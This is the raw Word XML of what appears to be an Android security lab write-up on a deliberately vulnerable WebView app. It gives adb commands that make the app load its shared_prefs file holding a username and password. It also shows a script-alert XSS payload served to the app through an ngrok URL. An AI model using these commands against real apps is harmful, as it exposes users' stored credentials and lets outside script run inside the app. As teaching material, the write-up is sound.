                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="2504659"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7473B52B" w14:textId="77777777" w:rsidR="00770E0A" w:rsidRDefault="00770E0A" w:rsidP="00770E0A"/>
    <w:p w14:paraId="68BA5946" w14:textId="1B6E123A" w:rsidR="00E6645F" w:rsidRDefault="00E6645F" w:rsidP="00E6645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645F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>With this setting, the constraints imposed by the same origin policy are lifted, and the WebView is now able to make requests to the web from files, which is normally not feasible. Using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> this</w:t>
      </w:r>
      <w:r w:rsidRPr="00E6645F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, an attacker can access local files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C55E59" w14:textId="77777777" w:rsidR="00E70738" w:rsidRDefault="00E70738" w:rsidP="00E6645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F92590" w14:textId="611218A4" w:rsidR="00E6645F" w:rsidRPr="00E6645F" w:rsidRDefault="00095E16" w:rsidP="00E6645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Let’s</w:t>
      </w:r>
      <w:r w:rsidR="00E160BC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> connect our emulator </w:t>
      </w:r>
      <w:r w:rsidR="007F7E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>with device using adb.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3796FBC4" w14:textId="1F6BD587" w:rsidR="00770E0A" w:rsidRPr="00462734" w:rsidRDefault="007F7E67" w:rsidP="00462734">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47FFE99" wp14:editId="552C5AB7">
            <wp:extent cx="5400000" cy="1881496"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="655179824" name="Picture 6551798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824" name="Picture 2"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00" cy="1881496"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="004BA807" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="00887247">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52FBD18B" w14:textId="1C9E4F0F" w:rsidR="007955CB" w:rsidRPr="009D100C" w:rsidRDefault="00BF749E" w:rsidP="00887247">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is the sensitive file </w:t>
      </w:r>
      <w:r w:rsidR="004E09F3" w:rsidRPr="004E09F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MainActivity.xml</w:t>
      </w:r>
      <w:r w:rsidR="004E09F3">
        <w:t xml:space="preserve"> which contains username and password </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">located in </w:t>
      </w:r>
      <w:r w:rsidR="00510E3C" w:rsidRPr="009D100C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/data/data/com.tmh.vuln</w:t>
      </w:r>
      <w:r w:rsidR="000045A2" w:rsidRPr="009D100C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>webview</w:t>
      </w:r>
      <w:r w:rsidR="00A22828" w:rsidRPr="009D100C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00A913BB" w:rsidRPr="009D100C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>shared_pre</w:t>
      </w:r>
      <w:r w:rsidR="0083223E" w:rsidRPr="009D100C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>fs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED77627" w14:textId="77777777" w:rsidR="00462734" w:rsidRDefault="00462734" w:rsidP="007C3709"/>
    <w:p w14:paraId="1B384CA7" w14:textId="77777777" w:rsidR="00DD06F1" w:rsidRDefault="00DD06F1" w:rsidP="007C3709"/>
    <w:p w14:paraId="776475F2" w14:textId="7179C325" w:rsidR="007955CB" w:rsidRDefault="00887247" w:rsidP="007C3709">
      <w:r>
        <w:t xml:space="preserve">We will try to call this sensitive </w:t>
      </w:r>
      <w:r w:rsidR="002E1CF0">
        <w:t xml:space="preserve">file using </w:t>
      </w:r>
      <w:r w:rsidR="00A375F1">
        <w:t>url.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381FBACD" w14:textId="423331A3" w:rsidR="00542A0C" w:rsidRDefault="0002724B" w:rsidP="00542A0C">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="0002724B">
        <w:t xml:space="preserve">adb shell am start -n </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0002724B">
        <w:t>com.tmh.vulnwebview</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0002724B">
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0002724B">
        <w:t>RegistrationWebView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0002724B">
        <w:t xml:space="preserve"> --es </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0002724B">
        <w:t>reg_url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FD1A0C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AD2619">
        <w:t>“</w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidR="00AD2619" w:rsidRPr="004D35FB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">file:///data/data/com.tmh. </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidR="00AD2619" w:rsidRPr="004D35FB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>vulnwebview</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="00AD2619" w:rsidRPr="004D35FB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>/shared_prefs/MainActivity.xml</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AD2619">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9AB669" w14:textId="41041913" w:rsidR="00A375F1" w:rsidRDefault="00A375F1" w:rsidP="004F15BA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DB65889" w14:textId="66DC326F" w:rsidR="00AD2619" w:rsidRDefault="00970DB7" w:rsidP="004F15BA">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2887C58F" wp14:editId="0F8F7F49">
            <wp:extent cx="5760000" cy="3010434"/>
            <wp:effectExtent l="19050" t="19050" r="0" b="0"/>
            <wp:docPr id="12450706" name="Picture 1245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706" name="Picture 12450706"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="3010434"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC94A40" w14:textId="77777777" w:rsidR="007955CB" w:rsidRDefault="007955CB" w:rsidP="007C3709"/>
    <w:p w14:paraId="2BA76212" w14:textId="19C3870A" w:rsidR="007955CB" w:rsidRDefault="005F2863" w:rsidP="00CB29F2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2893"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D653704" w14:textId="77777777" w:rsidR="005F2863" w:rsidRPr="007C3709" w:rsidRDefault="005F2863" w:rsidP="00CB29F2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2893"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EEEFFE7" w14:textId="77777777" w:rsidR="00BC54D1" w:rsidRDefault="00BC54D1" w:rsidP="007C3709"/>
    <w:p w14:paraId="45F204A0" w14:textId="77777777" w:rsidR="00BC54D1" w:rsidRPr="007C3709" w:rsidRDefault="00BC54D1" w:rsidP="007C3709"/>
    <w:p w14:paraId="699DC5F8" w14:textId="77777777" w:rsidR="009F1BD7" w:rsidRDefault="009F1BD7" w:rsidP="007C3709"/>
    <w:p w14:paraId="7D1014F4" w14:textId="77777777" w:rsidR="0082186D" w:rsidRDefault="0082186D" w:rsidP="007C3709"/>
    <w:p w14:paraId="55C99F01" w14:textId="77777777" w:rsidR="0082186D" w:rsidRDefault="0082186D" w:rsidP="007C3709"/>
    <w:p w14:paraId="36AECED6" w14:textId="77777777" w:rsidR="0082186D" w:rsidRDefault="0082186D" w:rsidP="007C3709"/>
    <w:p w14:paraId="75BB758E" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="2CF547ED" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="018B13A7" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="20F241BF" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="56269992" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="6C31D3CD" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="1BF9F2BE" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="22779ED2" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="4D2E1B16" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="1E317AFA" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="3022052A" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="6760A300" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRPr="007C3709" w:rsidRDefault="00CB29F2" w:rsidP="007C3709"/>
    <w:p w14:paraId="29FA8B00" w14:textId="259D545E" w:rsidR="009E38EE" w:rsidRPr="009E38EE" w:rsidRDefault="009E38EE" w:rsidP="005C68A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E38EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">JavaScript Enabled with Interface for </w:t>
      </w:r>
      <w:r w:rsidR="0022433D" w:rsidRPr="009E38EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>WebView</w:t>
      </w:r>
      <w:r w:rsidR="0022433D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="005C68A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6ED2E0" w14:textId="77777777" w:rsidR="009E38EE" w:rsidRDefault="009E38EE" w:rsidP="009E38EE"/>
    <w:p w14:paraId="409A6193" w14:textId="06365420" w:rsidR="009E38EE" w:rsidRDefault="00A013C8" w:rsidP="00D50740">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D45FD54" wp14:editId="5643D11F">
            <wp:extent cx="5760000" cy="2534119"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="19050"/>
            <wp:docPr id="1644210401" name="Picture 164421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0401" name="Picture 1644210401"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="2534119"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4838EBEE" w14:textId="77777777" w:rsidR="00A013C8" w:rsidRDefault="00A013C8" w:rsidP="009E38EE"/>
    <w:p w14:paraId="55A82039" w14:textId="2CEBCD5A" w:rsidR="00692057" w:rsidRDefault="00A013C8" w:rsidP="008E30AF">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00692057">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474CC2B5" w14:textId="77777777" w:rsidR="005C68A7" w:rsidRPr="005C68A7" w:rsidRDefault="005C68A7" w:rsidP="005C68A7"/>
    <w:p w14:paraId="73F7E01B" w14:textId="4D169E57" w:rsidR="00A013C8" w:rsidRDefault="00A013C8" w:rsidP="00A36BE8">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BE269A" w14:textId="54B3A1A3" w:rsidR="00A013C8" w:rsidRDefault="00A013C8" w:rsidP="00A36BE8">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"You are HACKED!!!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F5DA72" w14:textId="13938695" w:rsidR="00A36BE8" w:rsidRDefault="00A013C8" w:rsidP="005C68A7">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>&lt;/script</w:t>
      </w:r>
      <w:r w:rsidR="005C68A7">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AF4244" w14:textId="77777777" w:rsidR="00D50740" w:rsidRDefault="00D50740" w:rsidP="00A013C8"/>
    <w:p w14:paraId="792A3A71" w14:textId="77777777" w:rsidR="00D50740" w:rsidRDefault="00D50740" w:rsidP="00A013C8"/>
    <w:p w14:paraId="7ABC7D28" w14:textId="55C17173" w:rsidR="00A013C8" w:rsidRDefault="00A013C8" w:rsidP="00A013C8">
      <w:r>
        <w:t>Hosted it on the local server on port 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131A77F5" w14:textId="6410EFF1" w:rsidR="00A013C8" w:rsidRDefault="00692057" w:rsidP="00D50740">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06D9F431" wp14:editId="195126AC">
            <wp:extent cx="4848902" cy="990738"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="1335995769" name="Picture 133599576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95769" name="Picture 2"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48902" cy="990738"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="561F1AE7" w14:textId="77777777" w:rsidR="00C11E19" w:rsidRDefault="00C11E19" w:rsidP="00A013C8"/>
    <w:p w14:paraId="443CB586" w14:textId="24A71F86" w:rsidR="00692057" w:rsidRDefault="00692057" w:rsidP="00A013C8">
      <w:r>
        <w:t xml:space="preserve">Started </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ngrok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on port 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A07AC1" w14:textId="16AD4458" w:rsidR="00484E02" w:rsidRDefault="00484E02" w:rsidP="00484E02">
      <w:r>
        <w:t xml:space="preserve">Command -  </w:t>
      </w:r>
      <w:r w:rsidRPr="00484E02">
        <w:rPr>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F5FAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>ngrok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F5FAE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> http 8080</w:t>
      </w:r>
      <w:r w:rsidR="00DD06F1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003634D2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00484E02">
        <w:rPr>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0162C808" w14:textId="77777777" w:rsidR="00484E02" w:rsidRDefault="00484E02" w:rsidP="00A013C8"/>
    <w:p w14:paraId="215DA5D2" w14:textId="7C75F443" w:rsidR="00692057" w:rsidRDefault="00692057" w:rsidP="00D50740">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5428B86F" wp14:editId="22ED5B1E">
            <wp:extent cx="5731510" cy="1452880"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="346378982" name="Picture 346378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78982"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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D34BBD3" w14:textId="77777777" w:rsidR="00692057" w:rsidRDefault="00692057" w:rsidP="00A013C8"/>
    <w:p w14:paraId="46698430" w14:textId="59010ABD" w:rsidR="004F6387" w:rsidRDefault="00692057" w:rsidP="00A013C8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Connect your emulator using adb.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797E002B" w14:textId="77777777" w:rsidR="00CB29F2" w:rsidRDefault="00CB29F2" w:rsidP="00A013C8"/>
    <w:p w14:paraId="5F77248A" w14:textId="27438F39" w:rsidR="00692057" w:rsidRDefault="004F6387" w:rsidP="00A013C8">
      <w:r>
        <w:t>Then, u</w:t>
      </w:r>
      <w:r w:rsidR="00692057">
        <w:t>se the adb command to call the payload file from the webserver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209C04DD" w14:textId="379184D3" w:rsidR="001727EB" w:rsidRDefault="001727EB" w:rsidP="00A013C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001727EB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>adb shell am start -n componentname --es string “url/payload”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F1D1B0" w14:textId="77777777" w:rsidR="00C11E19" w:rsidRPr="001727EB" w:rsidRDefault="00C11E19" w:rsidP="00A013C8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="319060D7" w14:textId="2FCFE351" w:rsidR="00692057" w:rsidRDefault="00692057" w:rsidP="0022433D">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00692057">
        <w:t xml:space="preserve">adb shell am start -n </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00692057">
        <w:t>com.tmh.vulnwebview</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00692057">
        <w:t>/.SupportWebView --es support_url "https://0dda-106-201-239-192.ngrok-free.app/payload.html</w:t>
      </w:r>
      <w:r w:rsidR="00297292">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1212E600" w14:textId="77777777" w:rsidR="00692057" w:rsidRDefault="00692057" w:rsidP="00A013C8"/>
    <w:p w14:paraId="0E9F8642" w14:textId="14E8045E" w:rsidR="00692057" w:rsidRDefault="00692057" w:rsidP="00D50740">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23FC51A2" wp14:editId="2645DBD0">
            <wp:extent cx="5760000" cy="3010822"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="18415"/>
            <wp:docPr id="1809495261" name="Picture 180949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5261" name="Picture 1809495261"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="3010822"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
